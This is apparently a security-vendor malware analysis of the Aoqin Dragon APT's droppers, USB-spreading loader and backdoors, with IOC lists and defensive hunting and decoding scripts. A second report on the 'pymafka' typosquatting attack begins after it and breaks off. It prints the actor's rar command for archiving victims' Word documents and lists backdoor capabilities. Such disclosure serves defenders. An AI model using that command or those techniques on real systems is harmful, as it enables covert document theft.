The threat actor developed executable files disguised with fake file icons, such as Windows folder and antivirus vendor icons, acting as droppers to execute a backdoor and connect to the C2 server. Although executables with fake file icons have been used by a variety of actors, they remain an effective tool, especially against APT targets. Combined with “interesting” email content and a catchy file name, users can be socially engineered into clicking on the file.

Executable dropper with different fake security product icons

Typically, a script containing a rar command is embedded in the dropper. Based on the script contained in the executable, we can identify the document formats the actor was primarily trying to collect, such as Microsoft Word documents.

rar.exe a -apC -r -ed -tk -m5 -dh -tl -hpThis0nePiece -ta20180704 C:\DOCUME~1\ALLUSE~1\DRM\Media\B9CC6F75.ldf C:\*.doc C:\*.DOCX

Moreover, the dropper employs a worm infection strategy using a removable device to carry the malware into the target’s host and facilitate a breach into the secure network environment. We also found the same dropper deploying different backdoors including the Mongall backdoor and a modified Heyoka backdoor.

Removable Device as an Initial Vector

From 2018 to present, this actor has also been observed using a fake removable device as an initial infection vector. Over time, the actor upgraded the malware to protect it from being detected and removed by security products.

Here’s a summary of the attack chain of recent campaigns:

  1. A Removable Disk shortcut file is made which contains a specific path to initiate the malware.
  2. When a user clicks the fake device, it will execute the “Evernote Tray Application” and use DLL hijacking to load the malicious encrashrep.dll loader as explorer.exe.
  3. Once the loader executes, it checks whether it is running from an attached removable device.
  4. If the loader is not in the removable disk, it will copy all the modules under "%USERPROFILE%\AppData\Roaming\EverNoteService\", which includes normal files, the backdoor loader and an encrypted backdoor payload.
  5. The malware sets up an autostart entry with the value “EverNoteTrayUService”. When the user restarts the computer, it will again execute the “Evernote Tray Application” and use DLL hijacking to load the malicious loader.
  6. The loader will check the file path first and decrypt the payloads. There are two payloads in this attack chain: the first payload is the spreader, which copies all malicious files to removable devices; the second one is an encrypted backdoor which injects itself into rundll32’s memory.
Newest infection chain flow
Using USB shortcut techniques to spread the malware and infect target victims
Use a shortcut file to fake removable disc icon and change Evernote application name to RemovableDisc.exe

The spreader component tries to find removable devices in the victim’s environment. It copies all the malicious modules to any removable device it finds, excluding drive A, in order to spread the malware through the target’s network environment. The threat actor names this component “upan”, which we observe in the malware’s PDB strings.

C:\Users\john\Documents\Visual Studio 2010\Projects\upan_dll_test\Debug\upan.pdb
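For defenders, the staging directory and autostart value described above are straightforward to sweep for. The sketch below is a minimal, Windows-only hunting aid; it assumes the autostart value lives under the standard per-user Run key, which is our assumption rather than something stated above, while the directory path is taken from the infection chain.

import os
import winreg

EVERNOTE_DIR = os.path.expandvars(r"%USERPROFILE%\AppData\Roaming\EverNoteService")
RUN_KEY = r"Software\Microsoft\Windows\CurrentVersion\Run"

# Check for the staged module directory used by the loader.
if os.path.isdir(EVERNOTE_DIR):
    print("Found suspicious module directory:", EVERNOTE_DIR)
    for name in os.listdir(EVERNOTE_DIR):
        print("   ", name)

# Check for the autostart value (assumed to sit under the per-user Run key).
try:
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, RUN_KEY) as key:
        index = 0
        while True:
            try:
                name, value, _ = winreg.EnumValue(key, index)
            except OSError:
                break
            if "EverNote" in name:
                print("Suspicious Run value:", name, "=", value)
            index += 1
except OSError:
    pass  # Run key not present or not readable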

Malware Analysis

Aoqin Dragon relies heavily on the DLL hijacking technique to compromise targets and run their malware of choice. This includes their newest malware loader, the Mongall backdoor, and a modified Heyoka backdoor.

DLL-test.dll Loader

The DLL-test.dll loader is notable because it is used to initiate the infection chain. When a victim has been compromised, DLL-test.dll will check that the host drive is not A and test whether the drive is removable media or not. After these checks are complete, the loader opens the Removable Disk folder to simulate normal behavior. It then copies all modules from the removable drive to the “EverNoteService” folder. The loader will set up an auto start for “EverNoteTrayService” as a form of persistence following reboots.

After decrypting the encrypted payload, DLL-test.dll will execute rundll32.exe and run specific export functions. The loader injects the decrypted payload into memory and runs it persistently. The payload we found in this operation included a Mongall backdoor and a modified Heyoka backdoor.

We found that the code injection logic is identical to that in the book WINDOWS黑客编程技术详解 (Windows Hacking Programming Techniques Explained), Chapter 4, Section 3, which describes how to use memory to directly execute a DLL file. We also found the same code on GitHub. A debug string inside the DLL-test loader provides further evidence that this is the source of the code in the malware.

C:\users\john\desktop\af\dll_test_hj3\dll_test\memloaddll.cpp
C:\users\john\desktop\af\dll_test_hj3 -不过uac 不写注册表\dll_test\memloaddll.cpp
C:\users\john\desktop\af\dll_test - upan -单独 - 老黑的版本\dll_test\memloaddll.cpp

As stated above, the debug strings inside the DLL-test.dll loader provide interesting information about Aoqin Dragon TTPs. The loaders contain both debug strings and embedded PDB strings that give us further information about this loader’s features and which backdoor will be decrypted. For instance, “DLL_test loader for Mongall”, “DLL_test loader for Mongall but can’t bypass UAC and can’t add itself to registry”, “DLL-test loader for upan component” and “DLL-test for DnsControl”, which is a modified Heyoka backdoor.

C:\Documents and Settings\Owner\桌面\DLL_test\Release\DLL_test.pdb
C:\Users\john\Desktop\af\DLL_test_hj3\Debug\DLL_test.pdb
C:\Users\john\Desktop\af\DLL_test - upan -单独 - 老黑的版本\Debug\DLL_test.pdb
C:\Users\john\Desktop\af\DLL_test - upan -单独 - 老黑的版本\Release\DLL_test.pdb
C:\Users\john\Desktop\af\DLL_test_hj3 -不过UAC 不写注册表\Debug\DLL_test.pdb
D:\2018\DnsControl\DNS20180108\DLL_test\Release\DLL_test.pdb

Mongall Backdoor

Mongall is a small backdoor going back to 2013, first described in a report by ESET. According to the report, the threat actor was trying to target the Telecommunications Department and the Vietnamese government. More recently, Aoqin Dragon has been reported targeting Southeast Asia with an upgraded Mongall encryption protocol and Themida packer.

The Mongall backdoor uses a number of different mutexes and carries different notes in each build – the notes are shown in the IOC table. Based on the notes, we can estimate the malware creation time, intended targets, Mongall backdoor version, and related C2 domain name.

The backdoor mutex and information collection

The actors name this backdoor HJ-client.dll, and the backdoor name matches the PDB strings mentioned earlier. In addition, there are some notes containing “HJ” strings inside the backdoor.

Although Mongall is not particularly feature rich, it is still an effective backdoor. It can create a remote shell, upload files to the victim’s machine, and download files to the attacker’s C2. Most important of all, the backdoor embeds three C2 servers for communication. Below are the Mongall backdoor function descriptions and command codes.

Mongall backdoor function capability

We discovered that the Mongall backdoor’s network transmission logic can be found on the Chinese Software Developer Network (CSDN). Compared to the old Mongall backdoor, the new version upgrades the encryption mechanism. However, new versions of Mongall still send the victim machine’s information back via GET requests, encrypting it with RC4 or encoding it with base64. Another interesting finding from our analysis is that the encryption or encoding logic corresponds to the Mongall mutex in use. The table below maps each mutex to its data transformation algorithm.

Mutex Algorithm
Flag_Running Base64 (type 3)
Download_Flag Base64 (type 3)
Running_Flag Base64 (type 3)
Flag_Runnimg_2810 Modify base64 (type 2)
Flag_Running_2016 Modify base64 (type 2)
Flag_Running_2014RC4 RC4+base64 (type 1)

Faking a C2 server allowed us to capture Mongall beacon messages and develop a Python decryption script to reveal each version of the message. Alongside this report, we are publicly releasing the script here. The image below shows the encrypted strings and the decoded beacon information.

Decrypting the embedded beacon information
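The released script is the authoritative reference. Purely as an illustration of the “type 1” scheme from the table above, the sketch below base64-decodes a captured beacon and then applies RC4; the key, the sample input, and the exact layering of the two steps are assumptions made for demonstration rather than recovered values.

import base64

def rc4(key: bytes, data: bytes) -> bytes:
    """Standard RC4: key scheduling followed by keystream XOR."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) % 256])
    return bytes(out)

def decode_type1_beacon(beacon: str, key: bytes) -> bytes:
    # Assumed layering for the RC4+base64 variant: base64 on the wire, RC4 underneath.
    return rc4(key, base64.b64decode(beacon))

# Hypothetical usage with placeholder values:
# print(decode_type1_beacon(captured_beacon_string, b"placeholder-key"))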

Modified Heyoka Backdoor

We also observed another backdoor used by this threat actor. This backdoor is totally different from Mongall, as we found it is based on the open source Heyoka project. Heyoka is a proof-of-concept exfiltration tool that uses spoofed DNS requests to create a bidirectional tunnel. The threat actors modified and redesigned this tool into a custom backdoor, deploying it in the victim’s environment with a DLL injection technique. Simplified Chinese characters can be found in its debug log.

Left: the modified backdoor information; Right: the Heyoka source code
Debug information with simplified Chinese characters

This backdoor was named srvdll.dll by its developers. They not only expanded its functionality but also added two hardcoded C2s. The backdoor checks whether it is running as a system service, to make sure it has sufficient privileges and to keep itself persistent. The modified Heyoka backdoor is much more powerful than Mongall. Although both have shell capability, the modified Heyoka backdoor is generally closer to a complete backdoor product. The commands available in the modified Heyoka backdoor are tabulated below.

Command code Description
0x5 open a shell
0x51 get host drive information
0x3 search file function
0x4 input data in an exit file
0x6 create a file
0x7 create a process
0x9 get all process information in this host
0x10 kill process
0x11 create a folder
0x12 delete file or folder
Hardcoded command and control server in modified Heyoka backdoor
Backdoor with the DNS tunneling connection
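DNS tunneling of this kind typically encodes data into query labels, which tends to produce unusually long, high-entropy hostnames. The sketch below is a generic heuristic along those lines rather than a signature for this specific backdoor; the thresholds and the sample queries are illustrative only.

import math
from collections import Counter

def shannon_entropy(s: str) -> float:
    counts = Counter(s)
    total = len(s)
    return -sum((c / total) * math.log2(c / total) for c in counts.values())

def suspicious_dns_query(qname: str, max_label_len: int = 40, entropy_threshold: float = 3.5) -> bool:
    """Flag queries with very long or high-entropy labels, a common tunneling trait."""
    labels = qname.rstrip(".").split(".")
    for label in labels[:-2]:  # skip the registered domain and TLD
        if len(label) > max_label_len:
            return True
        if len(label) > 12 and shannon_entropy(label) > entropy_threshold:
            return True
    return False

# Illustrative check against hypothetical query log entries.
for q in ["www.example.com", "mf7a1c9d0b44aa31f0e882c.dns.foodforthought1.com"]:
    print(q, "->", "suspicious" if suspicious_dns_query(q) else "ok")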

Attribution

Throughout the analysis of Aoqin Dragon operations, we came across several artifacts linking the activity to a Chinese-speaking APT group as detailed in the following sections.

Infrastructure

One of Mongall’s backdoors was observed by Unit42 in 2015. They reported that the website of the president of Myanmar had been used in a watering hole attack on December 24, 2014. The attacker injected a JavaScript file with a malicious iframe to exploit the browsers of website visitors. In addition, they were also aware that another malicious script had been injected into the same website in November 2014, leveraging CVE-2014-6332 to download a trojan horse to the target’s host.

In 2013, a news report covered this group and the results of a police investigation. Police retrieved information from the C2 server and phishing mail server, whose operators were located in Beijing, China. The two primary backdoors used in this operation have overlapping C2 infrastructure, and most of the C2 servers can be attributed to Chinese-speaking users.

Two major backdoor C2s overlap
C2 attributed to Chinese-speaking users

Targeting and Motives

The targeting of Aoqin Dragon closely aligns with the Chinese government’s political interests. We primarily observed Aoqin Dragon targeting government, education, and telecommunication organizations in Southeast Asia and Australia.

Considering this long-term effort and continuous targeted attacks for the past few years, we assess the threat actor’s motives are espionage-oriented.

Conclusion

Aoqin Dragon is an active cyberespionage group that has been operating for nearly a decade. We have observed the Aoqin Dragon group evolve its TTPs several times in order to stay under the radar. We fully expect that Aoqin Dragon will continue conducting espionage operations. In addition, we assess it is likely they will also continue to advance their tradecraft, finding new methods of evading detection and staying longer in their target networks. SentinelLabs continues to track this activity cluster to provide insight into its evolution.

Indicators of Compromise

SHA1 Malware Family
a96caf60c50e7c589fefc62d89c27e6ac60cdf2c Mongall
ccccf5e131abe74066b75e8a49c82373414f5d95 Mongall
5408f6281aa32c02e17003e0118de82dfa82081e Mongall
a37bb5caa546bc4d58e264fe55e9e9155f36d9d8 Mongall
779fa3ebfa1af49419be4ae80b54096b5abedbf9 Mongall
2748cbafc7f3c9a3752dc1446ee838c5c5506b23 Mongall
eaf9fbddf357bdcf9a5c7f4ad2b9e5f81f96b6a1 Mongall
6380b7cf83722044558512202634c2ef4bc5e786 Mongall
31cddf48ee612d1d5ba2a7929750dee0408b19c7 Mongall
677cdfd2d686f7148a49897b9f6c377c7d26c5e0 Mongall
911e4e76f3e56c9eccf57e2da7350ce18b488a7f Mongall
c6b061b0a4d725357d5753c48dda8f272c0cf2ae Mongall
dc7436e9bc83deea01e44db3d5dac0eec566b28c Mongall
5cd555b2c5c6f6c6c8ec5a2f79330ec64fab2bb0 Mongall
668180ed487bd3ef984d1b009a89510c42c35d06 Mongall
28a23f1bc69143c224826962f8c50a3cf6df3130 Mongall
ab81f911b1e0d05645e979c82f78d92b0616b111 Mongall
47215f0f4223c1ecf8cdeb847317014dec3450fb Mongall
061439a3c70d7b5c3aed48b342dda9c4ce559ea6 Mongall
aa83d81ab543a576b45c824a3051c04c18d0716a Mongall
43d9d286a38e9703c1154e56bd37c5c399497620 Mongall
435f943d20ab7b3ecc292e5b16683a94e50c617e Mongall
94b486d650f5ca1761ee79cdff36544c0cc07fe9 Mongall
1bef29f2ab38f0219b1dceb5d37b9bda0e9288f5 Mongall
01fb97fbb0b864c62d3a59a10e785592bb26c716 Mongall
03a5bee9e9686c18a4f673aadd1e279f53e1c68f Mongall
1270af048aadcc7a9fc0fd4a82b9864ace0b6fb6 Mongall
e2e7b7ba7cbd96c9eec1bcb16639dec87d06b8dd Mongall
08d22a045f4b16a2939afe029232c6a8f74dcde2 Mongall
96bd0d29c319286afaf35ceece236328109cb660 Mongall
6cd9886fcb0bd3243011a1f6a2d1dc2da9721aec Mongall
271bd3922eafac4199322177c1ae24b1265885e8 Mongall
e966bdb1489256538422a9eb54b94441ddf92efc Mongall
134d5662f909734c1814a5c0b4550e39a99f524b Mongall
93eb2e93972f03d043b6cf0127812fd150ca5ec5 Mongall
a8e7722fba8a82749540392e97a021f7da11a15a Mongall
436a4f88a5c48c9ee977c6fbcc8a6b1cae35d609 Mongall
ab4cd6a3a4c1a89d70077f84f79d5937b31ebe16 Mongall
8340a9bbae0ff573a2ea103d7cbbb34c20b6027d Mongall
31b37127440193b9c8ecabedc214ef51a41b833c Mongall
ed441509380e72961b263d07409ee5987820d7ae Mongall
45d156d2b696338bf557a509eaaca9d4bc34ba4a Mongall
bac8248bb6f4a303d5c4e4ce0cd410dc447951ea Mongall
15350967659da8a57e4d8e19368d785776268a0e Mongall
008dd0c161a0d4042bdeb1f1bd62039a9224b7f0 Mongall
7e1f5f74c1bf2790c8931f578e94c02e791a6f5f Mongall
16a59d124acc977559b3126f9ec93084ca9b76c7 Mongall
38ba46a18669918dea27574da0e0941228427598 Mongall
19814580d3a3a87950fbe5a0be226f9610d459ed Mongall
d82ebb851db68bce949ba6151a7063dab26a4d54 Mongall
0b2956ad5695b115b330388a60e53fb13b1d48c3 Mongall
7fb2838b197981fbc6b5b219d115a288831c684c Mongall
af8209bad7a42871b143ad4c024ed421ea355766 Mongall
72d563fdc04390ba6e7c3df058709c652c193f9c Mongall
db4b1507f8902c95d10b1ed601b56e03499718c5 Mongall
f5cc1819c4792df19f8154c88ff466b725a695f6 Mongall
86e04e6a149fd818869721df9712789d04c84182 Mongall
a64fbd2e5e47fea174dd739053eec021e13667f8 Mongall
d36c3d857d23c89bbdfefd6c395516a68ffa6b82 Mongall
d15947ba6d65a22dcf8eff917678e2b386c5f662 Mongall
5fa90cb49d0829410505b78d4037461b67935371 Mongall
f2bf467a5e222a46cd8072043ce29b4b72f6a060 Mongall
e061de5ce7fa02a90bbebf375bb510158c54a045 Mongall
4e0b42591b71e35dd1edd2e27c94542f64cfa22f Mongall
330402c612dc9fafffca5c7f4e97d2e227f0b6d4 Mongall
5f4cd9cd3d72c52881af6b08e58611a0fe1b35bf Mongall
2de1184557622fa34417d2356388e776246e748a Mongall
9a9aff027ad62323bdcca34f898dbcefe4df629b Mongall
9cd48fddd536f2c2e28f622170e2527a9ca84ee0 Mongall
2c99022b592d2d8e4a905bacd25ce7e1ec3ed3bb Mongall
69e0fcdc24fe17e41ebaee71f09d390b45f9e5c2 Mongall
a2ea8a9abf749e3968a317b5dc5b95c88edc5b6f Mongall
0a8e432f63cc8955e2725684602714ab710e8b0a Mongall
309accad8345f92eb19bd257cfc7dd8d0c00b910 Mongall
89937567c575d38778b08289876b938a0e766f14 Mongall
19bd1573564fe2c73e08dce4c4ad08b2161e0556 Mongall
a1d0c96db49f1eef7fd71cbed13f2fb6d521ab6a Mongall
936748b63b1c9775cef17c8cdbba9f45ceba3389 Mongall
46d54a3de7e139b191b999118972ea394c48a97f Mongall
4786066b29066986b35db0bfce1f58ec8051ba6b Mongall
b1d84d33d37526c042f5d241b94f8b77e1aa8b98 Mongall
7bb500f0c17014dd0d5e7179c52134b849982465 Mongall
d1d3219006fdfd4654c52e84051fb2551de2373a Mongall
0ffa5e49f17bc722c37a08041e6d80ee073d0d8f Mongall
dceecf543f15344b875418ad086d9706bfef1447 Mongall
fa177d9bd5334d8e4d981a5a9ab09b41141e9dcc Mongall
07aab5761d56159622970a0213038a62d53743c2 Mongall
d83dde58a510bdd3243038b1f1873e7da3114bcf Mongall
a0da713ee28a17371691aaa901149745f965eb90 Mongall
c5b644a33fb027900111d5d4912e28b7dcce88ff Mongall
db5437fec902cc1bcbad4bef4d055651e9926a89 Mongall
ff42d2819c1a73e0032df6c430f0c67582adba74 Mongall
3b2d858c682342127769202a806e8ab7f1e43173 Mongall
c08bf3ae164e8e9d1d9f51dffcbe7039dce4c643 Mongall
f41d1966285667e74a419e404f43c7693f3b0383 Mongall
3ccb546f12d9ed6ad7736c581e7a00c86592e5dd Mongall
904556fed1aa00250eee1a69d68f78c4ce66a8dc Mongall
bd9dec094c349a5b7d9690ab1e58877a9f001acf Mongall
87e6ab15f16b1ed3db9cc63d738bf9d0b739a220 Mongall
f8fc307f7d53b2991dea3805f1eebf3417a7082b Mongall
ece4c9fc15acd96909deab3ff207359037012fd5 Mongall
7fdfec70c8daae07a29a2c9077062e6636029806 Mongall
17d548b2dca6625271649dc93293fdf998813b21 Mongall
6a7ac7ebab65c7d8394d187aafb5d8b3f7994d21 Mongall
fee78ccadb727797ddf51d76ff43bf459bfa8e89 Mongall
4bf58addcd01ab6eebca355a5dda819d78631b44 Mongall
fd9f0e40bf4f7f975385f58d120d07cdd91df330 Mongall
a76c21af39b0cc3f7557de645e4aaeccaf244c1e Mongall
7ff9511ebe6f95fc73bc0fa94458f18ee0fb395d Mongall
97c5003e5eacbc8f5258b88493f148f148305df5 Mongall
f92edf91407ab2c22f2246a028e81cf1c99ce89e Mongall
d932f7d11f8681a635e70849b9c8181406675930 Mongall
b0b13e9445b94ed2b69448044fbfd569589f8586 Mongall
b194b26de8c1f31b0c075ceb0ab1e80d9c110efc Mongall
df26b43439c02b8cd4bff78b0ea01035df221f68 Mongall
60bd17aa94531b89f80d7158458494b279be62b4 Mongall
33abee43acfe25b295a4b2accfaf33e2aaf2b879 Mongall
c87a8492de90a415d1fbe32becbafef5d5d8eabb Mongall
68b731fcb6d1a88adf30af079bea8efdb0c2ee6e Mongall
cf7c5d32d73fb90475e58597044e7f20f77728af Mongall
1ab85632e63a1e4944128619a9dafb6405558863 Mongall
1f0d3c8e373c529a0c3e0172f5f0fb37e1cdd290 Mongall
f69050c8bdcbb1b5f16ca069e231b66d52c0a652 Mongall
6ff079e886cbc6be0f745b044ee324120de3dab2 Mongall
8c90aa0a521992d57035f00d3fbdfd0fa7067574 Mongall
5e32a5a5ca270f69a3bf4e7dd3889b0d10d90ec2 Mongall
0db3626a8800d421c8b16298916a7655a73460de Mongall
01751ea8ac4963e40c42acfa465936cbe3eed6c2 Mongall
6b3032252b1f883cbe817fd846181f596260935b Dropper
741168d01e7ea8a2079ee108c32893da7662bb63 Dropper
b9cc2f913c4d2d9a602f2c05594af0148ab1fb03 Dropper
c7e6f7131eb71d2f0e7120b11abfaa3a50e2b19e Dropper
ae0fdf2ab73e06c0cd04cf79b9c5a9283815bacb Dropper
67f2cd4f1a60e1b940494812cdf38cd7c0290050 Dropper
aca99cfd074ed79c13f6349bd016d5b65e73c324 Dropper
ba7142e016d0e5920249f2e6d0f92c4fadfc7244 Dropper
98a907b18095672f92407d92bfd600d9a0037f93 Dropper
afaffef28d8b6983ada574a4319d16c688c2cb38 Dropper
98e2afed718649a38d9daf10ac792415081191fe Dropper
bc32e66a6346907f4417dc4a81d569368594f4ae Dropper
8d569ac92f1ca8437397765d351302c75c20525b Document exploit
5c32a4e4c3d69a95e00a981a67f5ae36c7aae05e Document exploit
d807a2c01686132f5f1c359c30c9c5a7ab4d31c2 Document exploit
155db617c6cf661507c24df2d248645427de492c Modified Heyoka
7e6870a527ffb5235ee2b4235cd8e74eb0f69d0e Modified Heyoka
2f0ea0a0a2ffe204ec78a0bdf1f5dee372ec4d42 DLL-test
041d9b089a9c8408c99073c9953ab59bd3447878 DLL-test
1edada1bb87b35458d7e059b5ca78c70cd64fd3f DLL-test
4033c313497c898001a9f06a35318bb8ed621dfb DLL-test
683a3e0d464c7dcbe5f959f8fd82d738f4039b38 DLL-test
97d30b904e7b521a9b7a629fdd1e0ae8a5bf8238 DLL-test
53525da91e87326cea124955cbc075f8e8f3276b DLL-test
73ac8512035536ffa2531ee9580ef21085511dc5 DLL-test
28b8843e3e2a385da312fd937752cd5b529f9483 Installer
cd59c14d46daaf874dc720be140129d94ee68e39 Upan component

Mongall C2 Servers: IP Addresses
10[.]100[.]0[.]34 (Internal IPs)
10[.]100[.]27[.]4 (Internal IPs)
172[.]111[.]192[.]233
59[.]188[.]234[.]233
64[.]27[.]4[.]157
64[.]27[.]4[.]19
67[.]210[.]114[.]99

Mongall C2 Servers: Domains
back[.]satunusa[.]org
baomoi[.]vnptnet[.]info
bbw[.]fushing[.]org
bca[.]zdungk[.]com
bkav[.]manlish[.]net
bkav[.]welikejack[.]com
bkavonline[.]vnptnet[.]info
bush2015[.]net
cl[.]weststations[.]com
cloundvietnam[.]com
cpt[.]vnptnet[.]inf
dns[.]lioncity[.]top
dns[.]satunusa[.]org
dns[.]zdungk[.]com
ds[.]vdcvn[.]com
ds[.]xrayccc[.]top
facebookmap[.]top
fbcl2[.]adsoft[.]name
fbcl2[.]softad[.]net
flower2[.]yyppmm[.]com
game[.]vietnamflash[.]com
hello[.]bluesky1234[.]com
ipad[.]vnptnet[.]info
ks[.]manlish[.]net
lepad[.]fushing[.]org
lllyyy[.]adsoft[.]name
lucky[.]manlish[.]net
ma550[.]adsoft[.]name
ma550[.]softad[.]net
mail[.]comnnet[.]net
mail[.]tiger1234[.]com
mail[.]vdcvn[.]com
mass[.]longvn[.]net
mcafee[.]bluesky1234[.]com
media[.]vietnamflash[.]com
mil[.]dungk[.]com
mil[.]zdungk[.]com
mmchj2[.]telorg[.]net
mmslsh[.]tiger1234[.]com
mobile[.]vdcvn[.]com
moit[.]longvn[.]net
movie[.]vdcvn[.]com
news[.]philstar2[.]com
news[.]welikejack[.]com
npt[.]vnptnet[.]info
ns[.]fushing[.]org
nycl[.]neverdropd[.]com
phcl[.]followag[.]org
phcl[.]neverdropd[.]com
pna[.]adsoft[.]name
pnavy3[.]neverdropd[.]com
sky[.]bush2015[.]net
sky[.]vietnamflash[.]com
tcv[.]tiger1234[.]com
telecom[.]longvn[.]net
telecom[.]manlish[.]net
th-y3[.]adsoft[.]name
th550[.]adsoft[.]name
th550[.]softad[.]net
three[.]welikejack[.]com
thy3[.]softad[.]net
vdcvn[.]com
video[.]philstar2[.]com
viet[.]vnptnet[.]info
viet[.]zdungk[.]com
vietnam[.]vnptnet[.]info
vietnamflash[.]com
vnet[.]fushing[.]org
vnn[.]bush2015[.]net
vnn[.]phung123[.]com
webmail[.]philstar2[.]com
www[.]bush2015[.]net
yok[.]fushing[.]org
yote[.]dellyou[.]com
zing[.]vietnamflash[.]com
zingme[.]dungk[.]com
zingme[.]longvn[.]net
zw[.]dinhk[.]net
zw[.]phung123[.]com

Modified Heyoka C2 Server: IP Address
45[.]77[.]11[.]148

Modified Heyoka C2 Server: Domain
cvb[.]hotcup[.]pw
dns[.]foodforthought1[.]com
test[.]facebookmap[.]top

MITRE ATT&CK TTPs

Tactic Technique Procedure/Comments
Initial Access T1566 – Phishing Threat actor uses fake-icon executables and document exploits as decoys
Initial Access T1091 – Replication Through Removable Media Copies malware to removable media and infects other machines
Execution T1569 – System Services Modified Heyoka sets itself up as a system service
Execution T1204 – User Execution Lures victims into double-clicking decoy files
Persistence T1547 – Boot or Logon Autostart Execution Sets a program to automatically execute during logon
Privilege Escalation T1055 – Process Injection Mongall injects an install module into a newly created process
Privilege Escalation T1055.001 – Dynamic-link Library Injection Mongall injects a DLL into rundll32.exe
Defense Evasion T1211 – Exploitation for Defense Evasion Uses document exploits to bypass security features
Defense Evasion T1027 – Obfuscated Files or Information Actors use the Themida packer to pack their malware
Defense Evasion T1055 – Process Injection Uses DLL hijacking to evade process-based defenses
Discovery T1033 – System Owner/User Discovery Collects user account information and sends it back to the C2
Discovery T1082 – System Information Discovery Collects OS version and MAC address
Collection T1560 – Archive Collected Data Dropper uses rar to archive specific file formats
Command and Control T1071.001 – Application Layer Protocol: Web Protocols Mongall communicates over HTTP
Command and Control T1071.004 – Application Layer Protocol: DNS Modified Heyoka uses DNS tunneling for C2 communications
Command and Control T1571 – Non-Standard Port Mongall uses ports 5050, 1352, etc. to communicate with the C2
Command and Control T1132 – Data Encoding Mongall uses base64 or RC4 to encode or encrypt data, making command and control traffic more difficult to detect

✇SentinelLabs

Use of Obfuscated Beacons in ‘pymafka’ Supply Chain Attack Signals a New Trend in macOS Attack TTPs

By: Phil Stokes

Overview

Researchers from Sonatype last week reported on a supply chain attack via a malicious Python package ‘pymafka’ that was uploaded to the popular PyPI registry. The package attempted to infect users by means of typosquatting: hoping that victims looking for the legitimate ‘pykafka’ package might mistype the query and download the malware instead.

While typosquatting may seem like a rather hit-and-miss way to infect targets, it hasn’t stopped threat actors from trying their luck, and it’s the second such attack we’ve seen in recent weeks using this method. Last week, SentinelLabs reported on CrateDepression, a typosquatting attack against the Rust repository that targeted macOS and Linux users.

Both attacks also made use of red-teaming tools to drop a payload on macOS devices that ‘beacons’ out to an operator. In the case of ‘pymafka’, the attackers further made use of a very specific packing and obfuscation method to disguise the true nature of the Mach-O payload, so specific in fact that we’ve only seen that method used in the wild once before, as part of the OSX.Zuru campaign.

While packing, obfuscation, and beacons are all techniques common enough in the world of Windows attacks, they have rarely been seen used against macOS targets until now. In this post, we review how these TTPs were seen in pymafka and other attacks, and offer defenders indicators to help detect their use on macOS endpoints.

The Pymafka Typosquatting Attack

Since the details of this attack were well-covered here, we will only briefly review the first stage of the attack for the purposes of context. The pymafka package was so named in the hope that users would confuse it with pykafka, a Kafka client for Python that is widely used in enterprises. Kafka itself is described as “an open-source distributed event streaming platform used by thousands of companies”, including “80% of all Fortune 100 companies”, a description which gives a fairly clear indication of the attackers’ interests.

The pymafka package contains a Python script that surveils the host and determines its operating system.

The setup.py script runs different logic for different platforms, including macOS

If the device is running macOS, it reaches out to a C2 and downloads a Mach-O binary called ‘MacOs’, which is then written to the /var/tmp (aka /private/var/tmp) directory with the filename “zad”.

Threat hunters should note that /var/tmp is not the same as the standard /tmp directory (aka /private/tmp), nor is it the same as the Darwin User $TMPDIR directory, both of which are more typical destinations for malware payloads. This little-used location may not be scanned or monitored by some security tools.

It might also be worth noting that ‘MacOs’ is itself a typo. The only form of this word used by Apple is cased as either ‘MacOS’ (the name of a directory inside every application bundle which contains the program executable) or ‘macOS’ (the official name of the operating system, replacing ‘OS X’). There is no Apple binary on the system that takes this word as a name. However, ‘MacOs’ is only used as the name of the file as it is stored remotely and may be useful in case-sensitive hunts across URL data, but as we noted above, the executable is written to the local file system as “zad”.
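For hunting, the drop location itself is a useful starting point. The sketch below walks /private/var/tmp and flags files that start with a Mach-O magic number; it is a coarse triage aid, not a verdict, and the 0xcafebabe magic also matches Java class files.

import struct
from pathlib import Path

# Mach-O magic numbers: thin 32/64-bit binaries (both byte orders) and fat binaries.
MACHO_MAGICS = {0xfeedface, 0xcefaedfe, 0xfeedfacf, 0xcffaedfe, 0xcafebabe, 0xbebafeca}

def is_macho(path: Path) -> bool:
    try:
        with open(path, "rb") as f:
            header = f.read(4)
        magic = struct.unpack(">I", header)[0]
    except (OSError, struct.error):
        return False
    return magic in MACHO_MAGICS

for entry in Path("/private/var/tmp").iterdir():
    if entry.is_file() and is_macho(entry):
        print("Mach-O binary in /private/var/tmp:", entry)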

Packed and Obfuscated Payload

The payload is packed with UPX, a common enough technique used to evade certain kinds of static scanning tools. Aside from pymafka, UPX was recently used in the Mac variant of oRat, in OSX.Zuru, and in a variant of DazzleSpy, but more interesting than the packing is the obfuscation found in the decompressed binary.

The obfuscation has strong overlaps with a payload from the OSX.Zuru campaign. In that campaign, Chinese-linked threat actors distributed a series of sophisticated trojanized apps, including iTerm, Navicat, SecureCRT and Microsoft Remote Desktop via sponsored links in the Baidu search engine. The selection of trojanized apps suggested the threat actor was targeting users of backend tools used for SSH and other remote connections and business database management.

The trojanized apps dropped a UPX-packed Mach-O at /private/tmp/GoogleUpdate that used the same obfuscation techniques we observe in the pymafka payload. In both cases, researchers suggested the payload functions as a Cobalt Strike beacon, reaching out to check-in with a remote operator for further tasking.

The unpacked binary from OSX.Zuru and the unpacked binary from pymafka are quite different in size, the former weighing in at 5.7MB versus the latter’s 3.6MB, yet analysis of the sections suggests they have been run through a common obfuscation mechanism. In particular, the __cstring and __const sections are not only the same size but have the exact same hash values in both binaries.

The highlighted data are common to both Zuru and pymafka payloads

The two executables also display very similar entropy across all sections.

The entropy profile of OSX.Zuru payload (left) and pymafka payload (right)

At this point, we are not suggesting that the campaigns are linked; it is possible that different actors may be coalescing around a set of similar TTPs and using a common tool or technique for obfuscating Cobalt Strike payloads.

Abusing Red Teaming Tools For macOS Compromises

More widely, our report on last week’s CrateDepression supply chain attack described how threat actors used a Poseidon Mythic payload as the second-stage of their infection chain. Mythic, like Cobalt Strike, is a legitimate tool that was designed to simulate real-world attacks for use by red teams. Unlike Cobalt Strike, Mythic is open source software that can be used “as-is” or forked and adapted at will.

